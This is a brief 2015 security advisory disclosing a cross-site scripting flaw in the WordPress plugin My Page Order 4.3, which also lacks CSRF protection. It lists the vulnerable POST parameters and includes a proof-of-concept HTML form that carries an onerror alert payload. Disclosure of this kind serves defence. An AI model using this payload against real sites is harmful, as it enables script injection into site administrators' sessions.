Subject: Cross-Site Scripting (XSS) in My Page Order 4.3

Date: Thu, 13 Aug 2015 18:09:43 +0200

Hello,

Plugin: My Page Order 4.3 https://wordpress.org/plugins/my-page-order/

1. Cross-Site Scripting (XSS)

Authenticated users (like editors) can inject html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/edit.php?post_type=page&page=mypageorder

Vulnerable parameters: pages, hdnParentID

Example PHP callstack:

mypageorder [/tmp/wpplugin/my-page-order/mypageorder.php:105]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/edit.php?post_type=page&page=mypageorder">

<input type="text" name="btnSubPages" value="1" />

<input type="text" name="pages" value='"><img src=x onerror=alert(1) />' />

<input type="submit" />

</form>

--

--

Regards,
Marcin Probola,